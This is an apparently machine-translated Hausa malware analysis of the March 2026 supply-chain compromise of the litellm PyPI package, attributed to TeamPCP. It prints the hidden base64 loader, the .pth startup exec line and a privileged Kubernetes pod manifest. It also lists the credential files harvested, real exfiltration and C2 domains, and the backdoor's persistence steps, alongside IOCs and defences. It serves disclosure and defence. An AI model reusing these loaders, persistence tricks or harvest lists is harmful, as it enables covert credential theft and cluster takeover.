Dalilin da ya sa wannan Matattarar ke
A ranar 24 ga Maris, 2026, shahararren kunshin Python litelm, wata hanyar shiga wakili ta LLM ta duniya wacce dubban mutane ke amfani da ita enterprises don tura zirga-zirga tsakanin aikace-aikace da masu samar da AI kamar OpenAI, Anthropic, Google, da AWS Bedrock, an yi musu kutse a ɓoye akan PyPI. An buga nau'ikan guda biyu masu guba (1.82.7 da 1.82.8) cikin mintuna 13 tsakanin juna, suna ɗauke da kayan aiki masu matakai da yawa waɗanda suka sace takardun shaida, suka fitar da sirrin girgije, suka bazu a gefe a cikin rukunin Kubernetes, kuma suka sanya ƙofar baya mai ɗorewa tare da damar aiwatar da lambar nesa.
Tare da kusan Saukewa miliyan 3.6 kowace rana da kuma zurfafa amfani da fasahar AI a cikin kayayyakin more rayuwa na girgije, litelm yana kan hanyar da duk abin da masu kai hari na zamani ke sha'awa: maɓallan API ga kowane babban mai samar da AI, takardun shaidar IAM na girgije, sirrin Kubernetes, da maɓallan SSH.
Amma sulhun litelm ba wani abu ne da ya faru ba. Ya kasance ƙarshen wani Yaƙin neman zaɓe na kwanaki biyar, kamfen na tsarin muhalli biyar ta wani mai barazana da aka sani da Ƙungiyar PCPwani kamfen wanda ya fara guba wa na'urorin daukar hoto na tsaro (Aqua Trivy, Checkmarx KICS), sannan ya yi amfani da na'urorin da aka sace CI/CD Takardun shaida don shiga cikin npm, OpenVSX, da kuma PyPI. Maharan sun yi amfani da kayan aikin da ƙungiyoyi ke amfani da su don kare hanyoyin samar da kayayyaki.
Wannan harin yana wakiltar wani sauyi a cikin dabarun sarkar samar da kayayyaki. Tsarin tsarin yanayi mai yawa, wanda ke lalata kayan aikin tsaro don isa ga babban darajar kayayyakin more rayuwa na AI, yana nuna matakin shiri da kuma balaga na aiki daidai da kayan aikin hari da ake ƙara samu. An maimaita nauyin a ainihin lokaci (nau'ikan nauyin kaya guda uku suna bayyana a cikin lambar tushe, gami da sigar da aka yi sharhi a baya), an yi rijistar kayayyakin more rayuwa na C2 kwana ɗaya kafin harin, kuma an zaɓi yankunan fitar da bayanai a hankali don kwaikwayon ingantattun kayayyakin more rayuwa na masu siyarwa. Injin tattara bayanai mai cikakken tsari, wanda ya ƙunshi nau'ikan 15+, gami da maƙasudai na musamman kamar maɓallan sa hannu na Cardano da saitunan WireGuard, yana nuna matakin cikakken aiki wanda ke nuna ci gaban malware da AI ke tallafawa azaman mai ninka ƙarfi.
tafiyar lokaci
| Kwanan wata (UTC) | Event |
|---|---|
| Maris 19 | TeamPCP ta yi wa alamun Aqua Trivy GitHub Action sassauci, tana maye gurbinsu da lambar mugunta da ke fitar da abubuwa daga jiki CI/CD sirri daga ma'ajiyar bayanai ta ƙasa |
| Maris 21 | Yarjejeniyar ta shafi Checkmarx KICS da AST GitHub Actions ta amfani da dabarun iri ɗaya. |
| Maris 22, 06:35 | BerriAI yana buga litellm 1.82.6 (tsaftataccen sigar ƙarshe) ta al'ada CI/CD pipeline wanda ke amfani da Trivy don duba tsaro |
| Maris 23 | TeamPCP ta yi rijista models.litellm.cloud (yankin cirewa). Ta yi sulhu kan fakitin npm 66+ da kuma ƙarin OpenVSX. |
| Maris 24, 10:39 | litelm 1.82.7 an buga shi zuwa PyPI -- an saka nauyin da aka saka a ciki proxy_server.py a tsarin module. Yana aiki akan shigo da kaya |
| Maris 24, 10:52 | litelm 1.82.8 an buga bayan mintuna 13 -- ya ƙara litellm_init.pth, wani tsari na Python wanda ke aiki akan kowace fara amfani da fassarar Python, ba kawai shigo da litelm ba. Yana nuna saurin ɗaukar nauyi |
| Maris 24, ~16:00 | PyPI tana cire dukkan nau'ikan guda biyu bayan rahotannin al'umma. An goge dukkan nau'ikan gaba ɗaya (ba a cire su ba) daga cikin fihirisa, kodayake har yanzu ana iya samun damar amfani da CDN tarballs. |
Window mai ɗaukar hoto: kimanin awanni 5.5. A wannan lokacin, duk wani pip install litellm, pip install --upgrade litellm, ko CI/CD pipeline cire sabuwar sigar zai aiwatar da nauyin da aka ɗora masa.
Yadda Malware Ya Shiga: Yarjejeniyar Cascading
Ba a karya kunshin litelm kai tsaye ba. Maharin ya isa gare shi ta hanyar Harin sarkar samar da kayayyaki mai hawa biyu:
Aqua Trivy GitHub Action (compromised March 19) --> LiteLLM CI/CD pipeline runs Trivy without pinned version --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI LiteLLM's CI/CD pipeline ya yi amfani da Trivy a matsayin na'urar daukar hoto ta tsaro - kayan aikin da aka tsara don kama raunin da ya faru shi ne abin da ke haifar da harin. Domin kuwa pipeline An yi nuni da Trivy ta hanyar alamar da za a iya canzawa maimakon wanda aka haɗa commit SHA, matakin da aka yi wa katsalandan ya gudana ta atomatik. Mummunan aikin Trivy ya fitar da sirrin muhalli, gami da PYPI_PUBLISH alamar, tana ba TeamPCP damar shiga aikin litelm PyPI kai tsaye.
Wannan dabarar "yin sulhu ga masu gadi" alama ce ta kamfen ɗin TeamPCP. Ta hanyar kai hari ga kayan aikin tsaro da farko (Trivy, Checkmarx KICS), maharan a lokaci guda sun kashe ganowa kuma sun sami damar shiga hanyoyin samar da kayayyaki na ƙasa.
Binciken Fasaha: Nauyin da Aka Ɗauka
Abubuwan allura
version 1.82.7 - Aiwatar da matakin module a cikin litellm/proxy/proxy_server.py (layi na 128):
import subprocess, base64, sys, tempfile, os b64_payload = "<~12KB base64 blob>" with tempfile.TemporaryDirectory() as d: p = os.path.join(d, "p.py") with open(p, "wb") as f: f.write(base64.b64decode(b64_payload)) subprocess.run([sys.executable, p]) Wannan lambar tana cikin iyakokin module tsakanin ƙamus na zahiri da na asali showwarning() aiki. Yana aiki nan take lokacin da litellm.proxy.proxy_server ana shigo da shi - wanda ke faruwa akan duk wani amfani da aikin wakili na litelm.
version 1.82.8 — An ƙara litellm_init.pth (Fayil ɗin saitin hanyar Python):
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) Python .pth fayiloli a ciki site-packages/ ana sarrafa su a kowace farawar mai fassara, amma layuka ne kawai suka fara da import Ana aiwatar da su azaman lambar sirri. Mai kai harin yana amfani da wannan ta hanyar ɗaure dukkan kayan aikin a kan guda ɗaya import bayani: import os, subprocess, sys; subprocess.Popen(...)Wannan ya fi ƙarfin proxy_server.py allura — yana aiki ko da ba a taɓa shigo da litellm ba, a kowace ƙaddamar da tsarin Python. pyproject.toml an gyara shi don haɗa wannan fayil ɗin a cikin rarrabawa:
include = [ { path = "litellm_init.pth", format = ["sdist", "wheel"] } ] Sigar 1.82.8 don haka tana da hanyoyi guda biyu na aiwatarwa masu zaman kansu: allurar proxy_server.py (yana kunna litellm proxy import) da kuma fayil ɗin .pth (yana kunna kowace farawar Python). Rashin aikin da aka yi a kanta abin lura ne - yana hana gano ko cire kowace hanya. Ƙaruwar lokacin shigo da kaya zuwa aiwatar da lokacin farawa mintuna 13 bayan 1.82.7 ya nuna cewa maharin yana sa ido kan nasarar tura kayan aiki kuma yana sake maimaitawa cikin sauri.
Mataki na 1: Girbi Takardun Shaida Mai Kyau
Rubutun ciki da aka fassara wani tsari ne mai matuƙar inganci na takardar shaidar aiki. Yana amfani da shi os.walk(), glob.glob(), subprocess.check_output(), kuma fayil ɗin kai tsaye yana karantawa don share dukkan tsarin:
| category | hari |
|---|---|
| Sake duba tsarin | hostname, whoami, uname -a, ip addr, printenv, ip route |
| SSH | ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; maɓallan masauki daga /etc/ssh/ |
| Girgije (AWS) | ~/.aws/credentials, ~/.aws/config; Takardun shaidar rawar IMDS ta hanyar 169.254.169.254; Manajan Sirri ListSecrets; SSM DescribeParameters |
| Girgije (GCP) | ~/.config/gcloud/ (maimaita amfani da kalmomi); $GOOGLE_APPLICATION_CREDENTIALS |
| Gajimare (Azure) | ~/.azure/ (maimaita amfani); masu canjin yanayi |
| Kubernetes | Alamun asusun sabis; ca.crt; sunan sarari; kubectl get secrets --all-namespaces; duk sirrin ta hanyar K8s API |
| Fayilolin muhalli | .env, .env.local, .env.production, .env.development, .env.staging — an bincika akai-akai (zurfin 6) a fadin /home, /root, /opt, /srv, /var/www, /app, /data, /tmp |
| Docker | ~/.docker/config.json, /kaniko/.docker/config.json |
| Alamun fakiti | ~/.npmrc, ~/.vault-token, ~/.netrc |
| Databases | ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, Saitin MongoDB |
| TLS / SSL | Maɓallan sirri daga /etc/ssl/private/, Bari Mu Ƙirƙiri takaddun shaida, duk .pem/.key/.p12/.pfx files |
| Git | ~/.git-credentials, ~/.gitconfig |
| CI/CD | terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg |
| Wutar Crypto | Bitcoin, shagon maɓallan Ethereum, maɓallan Solana (mai tabbatarwa, ƙuri'a, gungumen itace, famfo), maɓallan sa hannu na Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero |
| Tarihin Shell | .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history |
| Mai tabbatar da tsarin | /etc/passwd, /etc/shadow, rajistan ayyukan izini (zaman SSH da aka yarda da su) |
| Maɓallan Webhook/API | Yanar gizo ta Grep don Slackhooks, Yanar gizo ta Discordhooks, Maɓallan API/asirai a cikin fayilolin daidaitawa |
| VPN | Saitunan WireGuard daga /etc/wireguard/ |
Faɗin wannan na'urar harvester yana da ƙamus. Ba wai kawai tana mai da hankali kan takardun shaidar girgije ba, har ma da walat ɗin cryptocurrency, kalmomin shiga na bayanai, saitunan VPN, da CI/CD sirri — yana nuna cewa maharin yana da niyyar samun kuɗi daga tsarin da aka lalata a cikin vectors da yawa.
Mataki na 2: Rufaffen Exfiltration
Ana ɓoye bayanan da aka sata kuma ana tace su ta amfani da tsarin ɓoye bayanai na haɗin gwiwa:
- Saukewa: AES-256-CBC ɓoye duk bayanan da aka tattara tare da maɓallin zaman 32-byte bazuwar (ta hanyar
openssl enc) - RSA-4096 ɓoye maɓallin zaman ta amfani da maɓallin jama'a da aka saka na maharin (OAEP padding, via
openssl pkeyutl) - An haɗa fayilolin ciphertext guda biyu kamar yadda aka haɗa su
tpcp.tar.gz(datpcpprefix — “TeamPCP” — yana bayyana akai-akai a cikin kamfen ɗin) - HTTPS POST zuwa
https://models.litellm.cloud/tare daContent-Type: application/octet-stream
Yankin yanki models.litellm.cloud an yi rijistarsa a ranar 23 ga Maris — kwana ɗaya kafin harin — kuma an tsara shi don haɗawa da ingantattun kayayyakin more rayuwa na litelm (ainihin aikin yana amfani da shi) litellm.ai) Ko da mai kare cibiyar sadarwa wanda ke nazarin zirga-zirgar fita bazai iya nuna zirga-zirgar zuwa ga abin da ya bayyana a matsayin ƙarshen samfurin litellm ba.
Mataki na 3: Ƙofar Baya Mai Dorewa (sysmon.py)
Kayan aikin yana shigar da ƙofar zaɓe ta baya wacce aka ɓoye a matsayin tsarin telemetry:
- hanyar:
~/.config/sysmon/sysmon.py - Service:
sysmon.service(sashin mai amfani da tsarin, wanda aka bayyana a matsayin "Sabis na Telemetry na Tsarin") - halayyarBayan barci na farko na daƙiƙa 300, an yi bincike
https://checkmarx.zone/rawkowane ~ minti 50 - kisa: Sauke adireshin da C2 ya mayar zuwa
/tmp/pglog, yana saita shi wanda za'a iya aiwatarwa (chmod 755), yana gudanar da shi a cikin zaman da aka keɓe - Bin diddigin jiha:
/tmp/.pg_stateyana hana sake saukar da irin wannan nauyin - dagewa:
Restart=always,RestartSec=10- yana tsira daga hadarurruka da sake kunnawa
Yankin yanki checkmarx.zone kuskuren rubutu ne na Checkmarx (kamfanin tsaro a checkmarx.com), an tsara shi ne ta yadda masu sharhi kan SOC da ke duba rajistar hanyar sadarwa za su ga zirga-zirgar zuwa ga abin da ya bayyana a matsayin halaltaccen mai samar da tsaro. Wannan dabara ce ta gujewa da gangan wadda ta yi daidai da babban dabarun TeamPCP na ɓoyewa a bayan alamar masu samar da tsaro.
Mataki na 3b: Motsin Layi na Kubernetes
Idan tsarin da aka yi wa illa yana da takardun shaidar asusun sabis na Kubernetes, malware ɗin yana lissafa duk nodes ɗin rukuni kuma yana tura su. kwastomomi masu fa'ida ga kowanne:
pod_manifest = { 'apiVersion': 'v1', 'kind': 'Pod', 'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'}, 'spec': { 'nodeName': node_name, 'hostPID': True, 'hostNetwork': True, 'tolerations': [{'operator': 'Exists'}], 'containers': [{ 'name': 'setup', 'image': 'alpine:latest', 'command': ['sh', '-c', drop_cmd], 'securityContext': {'privileged': True}, 'volumeMounts': [{'name': 'host', 'mountPath': '/host'}] }], 'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}], 'restartPolicy': 'Never' } } Kowane akwati:
- Yana gudana kamar mai gata tare da
hostPID,hostNetwork, da kuma cikakken damar shiga tsarin fayil ɗin mai masaukin baki - amfani
chroot /hostdon shigar da shi iri ɗayasysmon.pyƙofar baya a kan tsarin tushen fayil ɗin mai masaukin baki - Yana yin rijistar sa a matsayin sabis na systemd, yana tabbatar da dorewar gogewar pod
- mai suna
node-setup-*a cikinkube-systemnamespace ya bayyana a matsayin ingantaccen tsarin gungu
Wannan yana nufin wanda aka yi masa sulhu guda ɗaya CI/CD mai gudu tare da damar K8s zai iya haifar da kowace kumburi a cikin rukunin ta kasance a baya. - wani mummunan yanayi na motsi na gefe ga ƙungiyoyin da ke gudanar da litelm a matsayin wakili a Kubernetes.
Juyin Halittar Albashi (Bambance-bambancen da aka yi Sharhi)
Lambar tushe a layukan 131-132 ta ƙunshi nau'ikan nau'ikan kayan aiki guda biyu da aka yi sharhi a baya, waɗanda ke bayyana tsarin haɓaka maharin:
- Duk nau'ikan guda uku suna raba irin wannan tsarin fitar da ruwa (
models.litellm.cloud), maɓallin jama'a na RSA-4096, na'urar ɓoye bayanai ta haɗin gwiwa ta AES-256-CBC + RSA, da kumatpcp.tar.gzSuna a cikin fakiti - Nau'ikan da suka gabata an ƙara wani Layer ɓoyayyen RC4 a cikin rubutun tattara bayanai, yana ɓoye bayanan da aka girba kafin murfin AES+RSA na waje. Nauyin aiki mai aiki (layi 130) ya sauƙaƙa ta hanyar cire wannan layin RC4 na ciki
- Ana amfani da bambance-bambancen da suka gabata
exec()tare daStringIOkamawa don gudanar da mai tarawa a cikin tsari, yayin da kayan aiki masu aiki ke amfani dasubprocess.run()tare da tura stdout - rabuwa mai tsabta wanda ke guje wa gurɓata tsarin mai masaukin baki - Duk nau'ikan guda uku sun mayar da hankali kan nau'ikan takardar shaida iri ɗaya da hanyoyin tattarawa iri ɗaya
- Maɓallin RC4 a cikin bambance-bambancen da suka gabata ya kasance abin tayar da hankali, daidai da ɗabi'ar mai wasan kwaikwayo ta neman kulawa a Telegram.
Wannan yana nuna ci gaba mai aiki yayin aikin. Maharin ya sauƙaƙa tarin ɓoye bayanai da inganta keɓewa yayin da yake kiyaye maƙasudin tattarawa da kayayyakin fitar da bayanai cikin kwanciyar hankali.
Alamomin Yarjejeniya (IOCs)
Network
| nuna alama | type | Nufa |
|---|---|---|
models.litellm.cloud | domain | Ƙarshen Ƙarshen Ƙarshe (HTTPS POST) |
checkmarx.zone | domain | Ƙarshen zaɓen C2 (HTTPS GET) /raw) |
Lura: Hanyoyin haɗin rahoto na waje checkmarx.zone/static/checkmarx-util-1.0.4.tgz zuwa farkon matakin KICS na kamfen ɗin TeamPCP. Wannan URL ɗin ba a same shi a cikin nauyin biyan kuɗi na litelm da aka yi nazari a nan ba.
Fakitin Hashes
| fayil | SHA256 |
|---|---|
litellm-1.82.7.tar.gz | 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea |
litellm-1.82.8.tar.gz | d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5 |
Fayil din fayil
| nuna alama | type | Nufa |
|---|---|---|
~/.config/sysmon/sysmon.py | fayil | Rubutun ƙofar baya mai ɗorewa |
~/.config/systemd/user/sysmon.service | fayil | Na'urar juriya ta tsarin |
/tmp/pglog | fayil | An sauke binary na mataki na biyu |
/tmp/.pg_state | fayil | Bin diddigin yanayin C2 |
litellm_init.pth in site-packages/ | fayil | Ƙoƙarin farawa na Python (v1.82.8 kawai) |
tpcp.tar.gz | fayil | Kunshin tacewa mai ɓoyewa |
Kubernetes
| nuna alama | type | Nufa |
|---|---|---|
node-setup-* kwalaye a cikin kube-system | kwafsa | Ƙungiyoyin motsi na gefe masu gata |
sysmon.service akan maƙallan gungu | Service | Juriya matakin mai masaukin baki ta hanyar tserewa daga pod |
Rubutun Sirri
| nuna alama | details |
|---|---|
| Maɓallin jama'a na RSA-4096 mai kai hari | zanen yatsa na SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8An saka shi a cikin dukkan nau'ikan nau'ikan kayan aiki guda uku; maɓalli ɗaya da aka ruwaito a cikin sauran ayyukan TeamPCP |
tpcp prefix a cikin kayan tarihi | Yarjejeniyar sanya suna a cikin rukuni (tpcp.tar.gz) daidai gwargwado a duk faɗin kamfen ɗin |
Haƙƙin mallaka: TeamPCP
An bi diddigin mai barazanar da ke bayan wannan kamfen kamar haka Ƙungiyar PCP, wanda kuma aka sani da PCPcat, Persy_PCP, ShellForce, da DeadCatx3.
Halaye da aka sani:
- Yana kula da tashoshin Telegram a
@Persy_PCPda kuma@teampcpinda suka yi wa kamfanonin tsaro ba'a - Yana aiki a cikin tsarin halittu daban-daban (GitHub Actions, PyPI, npm, OpenVSX)
- Yana amfani da yankunan rubutu na musamman ga mai siyarwa don kowane mataki na kamfen ɗin (misali,
checkmarx.zonedon Checkmark,models.litellm.clouddon ƙaramin yaro) - Alamun kayayyakin more rayuwa masu daidaito: maɓallan RSA iri ɗaya,
tpcp.tar.gzyarjejeniyar sanya suna,tpcp-docs-*Ana amfani da ma'ajiyar ajiya ta GitHub azaman ma'ajiyar bayanai mara tushe - Ana sa ran kayan aikin tsaro su zama wuraren shiga hanyoyin samar da kayayyaki na ƙasa
Amincewar ikon mallaka: Babban. Makullin jama'a na RSA da aka raba, tpcp suna da kayan tarihi, haɗin gwiwar kayayyakin more rayuwa na C2, da kuma saurin aiki a cikin kamfen ɗin na kwanaki biyar suna haɗa yarjejeniyar Trivy, KICS, npm, OpenVSX, da litellm da wannan ɗan wasan.
Motivation: Wataƙila kuɗi ne (satar walat ɗin crypto, samun kuɗi ta hanyar amfani da takardun shaidar girgije) tare da shahara (zagi ta Telegram). Faɗin tattara takardun shaida - daga AWS IAM zuwa maɓallan maɓallan mai tabbatar da Solana zuwa saitunan WireGuard - yana nuna mai sha'awar kuɗi wanda ke neman haɓaka ROI daga kowace yarjejeniya.
Taimakon AI mai yiwuwa: Na'urar tattara bayanai ta ƙunshi sassa 15+, waɗanda suka haɗa da maƙasudai na musamman kamar maɓallan sa hannu na Cardano, saitunan WireGuard, da takardun shaidar Kaniko Docker - ta hanyar da ta dace da ƙididdigar taimakon AI. Saurin maimaita nauyin aiki (nau'ikan abubuwa uku tare da tsare-tsaren ɓoye bayanai daban-daban), daidaitawar tsarin halittu (tsarin halittu 5 a cikin kwanaki 5), da kuma OPSEC na aiki (yankunan da ke kwaikwayon masu siyarwa, ɓoye bayanai na haɗin gwiwa, juriyar tsarin da aka ɓoye a matsayin telemetry) yana nuna matakin fitarwa wanda zai iya nuna ci gaban da AI ke bayarwa a matsayin mai ninka ƙarfi. Wannan kimantawa hasashe ne; ƙwararrun masu aiki za su iya cimma irin wannan iyaka ba tare da kayan aikin AI ba.
Sabbin TTPs da Dabaru
1. Guba a Sarkar Kayan Aikin Tsaro (T1195.002 bambance-bambancen)
Na'urorin daukar hoto na tsaro (Trivy, KICS) a matsayin hanya ta farko ta isa ga wuraren da ke fuskantar barazanar tsaro wani sabon ci gaba ne. Maharin bai yi wa dakin karatu illa kawai ba - sun yi wa kayan aikin da ƙungiyoyi ke amfani da su lalata. Tsinkayen Dakunan karatu da aka yi wa lahani. Wannan yana haifar da makanta: na'urar daukar hoto da za ta kama lambar mugunta ita ce kanta hanyar isar da saƙo.
2. Python .pth Tsarin Fayil (T1546)
The litellm_init.pth dabarar da ke cikin v1.82.8 tana da matuƙar rikitarwa. .pth fayiloli a ciki site-packages/ ana sarrafa su a kowace farawar mai fassara; kowane layi da ya fara da import ana aiwatar da shi azaman lambar. Ta hanyar ɗaure nauyin da aka ɗora akan guda ɗaya import A cikin wata sanarwa, maharin ya cimma aiwatarwa a kan kowace hanyar Python - ba kawai lokacin da aka shigo da litelm ba. Wannan yana nufin cewa kayan aikin yana ƙonewa ko da an shigar da litelm amma ba a taɓa amfani da shi ba, kuma yana tsira daga gyara wanda ya maye gurbin wanda aka lalata. .py fayiloli ba tare da an duba su ba .pth fayiloli.
3. Motsin Kubernetes na Faɗin Layi ta hanyar Shigar da Pod Mai Kyau (T1610, T1611)
Ƙirƙirar kwasfunan da suka dace ta atomatik akan kowane ɓangaren rukuni - tare da hostPID, hostNetwork, tsarin fayil ɗin mai masaukin baki, da kuma chroot don shigar da juriya — jigilar kwantena na sarƙoƙi (T1610) tare da tserewa zuwa mai masaukin baki (T1611) don mayar da aikin da aka yi wa rauni guda ɗaya zuwa cikakken sulhu na rukuni.
4. Mai Sayarwa-Yin Kwaikwayon Kayayyakin C2
Amfani models.litellm.cloud (kamar litelm) kuma checkmarx.zone (yana kwaikwayon Checkmarx) kamar yadda aka tsara ƙarshen C2/exfil don guje wa sa ido kan hanyar sadarwa. Masu sharhi na SOC waɗanda ke yin bitar zirga-zirgar fitarwa za su ga haɗin HTTPS zuwa abin da ya zama halaltaccen yanki na masu siyarwa.
5. Saurin Saurin Saurin Saurin Saurin Saurin Sauri
Buga v1.82.7 tare da aiwatar da lokacin shigo da kaya, sannan v1.82.8 tare da aiwatar da lokacin farawa mintuna 13 bayan haka, yana nuna mai kai hari yana sa ido da daidaitawa a ainihin lokacin. Bambance-bambancen nauyin da aka yi sharhi (tare da tsare-tsaren ɓoyewa daban-daban) da aka adana a cikin lambar tushe suna tabbatar da ci gaba mai aiki yayin aikin.
Abin da za a iya yi
Wannan harin yana amfani da aminci a kowane mataki: amincewa da kayan aikin tsaro, amincewa da rajistar fakiti, amincewa da yankuna da aka saba gani, amincewa da CI/CD sarrafa kansa. Kare kai daga gare ta yana buƙatar taurare kowace daga cikin waɗannan iyakokin aminci:
Ga Masu Amfani da Kunshin
- Dogayen abubuwan da aka yi amfani da su ta hanyar hash, ba kawai sigar ba.
pip install litellm==1.82.6 --hash=sha256:...da zai hana shigar da nau'ikan da aka lalata koda kuwa sun bayyana a matsayin sabuwar sigar ta ɗan lokaci. - Yi amfani da fayilolin kulle.
pip-compile,poetry.lock, Da kumauv.lockkama ainihin sigar da hashes. CI/CD ya kamata a shigar da shi daga fayilolin makulli, ba daga masu tantance sigar da ke iyo ba. - Saka idanu don
.pthfayiloli. Dubawa akai-akaisite-packages/don ba zato ba tsammani.pthfayiloli - suna aiki akan kowace farawa ta Python kuma tsarin juriya ne wanda ba a yaba masa ba. - Aiwatar da sarrafa hanyoyin sadarwa na fitarwa. Fitar da ruwa zuwa
models.litellm.cloudda kuma zaɓen C2 zuwa gacheckmarx.zoneza a iya kama shi ta hanyar tace fitarwa bisa ga jerin izini a cikin yanayin samarwa.
Ga Masu Kula da Kunshin
- Fil CI/CD ayyukan ta commit SHA, ba alama ba. LiteLLM's pipeline An yi amfani da Trivy ba tare da sigar da aka manne ba. Da an yi nuni da shi
aquasecurity/trivy-action@<commit-sha>maimakon@latest, matakin da aka yi wa katsalandan ba zai aiwatar ba. - Yi amfani da alamun bugawa na ɗan gajeren lokaci, waɗanda aka tsara su da tsari. PyPI tana goyan bayan Amintattun Masu Buga Littattafai (wanda ke tushen OIDC) da kuma alamun API da aka zana.
PYPI_PUBLISHBai kamata a yi amfani da alamar don samun damar bugawa na dogon lokaci ba, ba tare da ƙuntatawa ba. - Kunna tantance abubuwa biyu akan PyPI. Bukatar 2FA ga duk masu kula da kayan aiki kuma yi amfani da maɓallan tsaro na kayan aiki inda zai yiwu.
- Kunshin alamun. Shaidar Sigstore/PEP 740 tana ba wa masu amfani damar tabbatar da cewa an gina fakitin ta hanyar da ake tsammani. CI/CD pipeline, ba ta hanyar wani mahari da aka sace ba.
Ga Masu Aiki da Dandalin (PyPI, npm, GitHub)
- Gano tsarin bugawa mara kyau. Sabbin nau'ikan guda biyu da aka buga mintuna 13 tsakanin su, daga wani IP ko alama daban da yadda aka saba, yakamata a fara amfani da na'urar daukar hoto ta atomatik kafin a iya shigar da fakitin.
- Haɓaka Karɓar Amintattun Mawallafa. Buga littattafai bisa tushen OIDC yana haɗa fakitin zuwa takamaiman ma'ajiyar bayanai da ayyukan aiki, yana sa alamun da aka sata ba su da amfani a waje da na asali CI/CD mahallin.
- Aiwatar da na'urar tantance malware ta lokacin bugawa. Za a iya gano nauyin biyan kuɗi na base64 da aka fassara a cikin proxy_server.py ta hanyar nazarin tsaye a lokacin bugawa.
Ga Tsarin Yanayi
- Ka ɗauki kayan aikin tsaro a matsayin muhimman ababen more rayuwa. Miliyoyin mutane suna amfani da KICS na Trivy da Checkmarx pipelines. Ya kamata a sanya hannu a kan Ayyukan GitHub ɗinsu, a manne su, sannan a sa ido a kansu da irin ƙarfin da suke da shi na fakitin da suke dubawa.
- Zuba jari a gano lokacin aiki. Binciken tsaye kaɗai ba zai iya kama kowace dabarar ɓoye bayanai ba. Kula da lokacin aiki na shigar da fakitin. hooks, haɗin hanyar sadarwa da ba a zata ba, da kuma tsarin samun damar fayiloli masu shakku suna ba da kariya a cikin zurfi.
- Raba bayanan sirri na barazana cikin sauri. Da ace an yi amfani da tsarin daukar hoto na awanni 5.5 don litellm, da an yi shi gajere, tare da saurin daidaitawa tsakanin masu siyarwa da masu siyarwa. Ayyukan daukar hoto na atomatik kamar Xygeni MEW, Socket, da Snyk sun gano matsalar - matsalar ita ce lokacin tabbatar da mutum da kuma lokacin amsawar rajista.
Kammalawa
Yaƙin neman zaɓen TeamPCP lokaci ne mai cike da tarihi software supply chain securityTa hanyar yin amfani da na'urorin daukar hoto na tsaro da farko da kuma amfani da su a matsayin matakan hawa zuwa ga kayayyakin more rayuwa masu daraja na AI, maharan sun nuna cewa sarkar samar da kayayyaki tana da ƙarfi kamar yadda take da rauni a cikin dogaronta na ɗan lokaci, kuma wannan dogaro na iya zama kayan aikin tsaro da kuke amincewa da shi don kiyaye ku lafiya.
Yarjejeniyar litelm ta nuna ƙaruwar haɗarin da ke tattare da kayayyakin more rayuwa na AI. Yayin da ƙofofin wakilci na LLM suka zama standard tsari don enterprise Tsarin AI, suna mai da hankali kan samun damar shiga maɓallan API, takardun shaidar girgije, da bayanai masu mahimmanci a cikin wani ɓangare guda. Yin watsi da wannan ɓangaren shine maɓalli na kwarangwal ga dukkan tarin AI.
Ƙungiyoyin da suka shigar da litelm 1.82.7 ko 1.82.8 a lokacin da ake buƙatar aiki na awanni 5.5 ya kamata su ɗauki wannan a matsayin cikakken sulhu na takardar shaida: juya duk sirrin da ke kan tsarin da abin ya shafa, duba rukunin Kubernetes don node-setup-* kwalaye a cikin kube-system, cire duk wani sysmon.service na'urorin systemd, kuma duba litellm_init.pth a cikin Python site-packages/ kundin adireshi. Masu amfani da hoton Docker na hukuma (ghcr.io/berriai/litellm) ba su shafi ba, domin hoton ya liƙe abubuwan da suka dogara da shi kuma ba a sake gina shi ba a lokacin da aka fallasa shi.
Game da Author
Co-kafa & CTO
Hoton Luis Rodriguez Wanda ya kafa kuma CTO ne a Xygeni Security. Tare da shekaru 20+ a fannin tsaron aikace-aikace, ya mai da hankali kan kariyar AppSec da kuma ci gaba da fasahar nazarin lambar da ke taimaka wa ƙungiyoyi rage haɗarin isar da kaya.




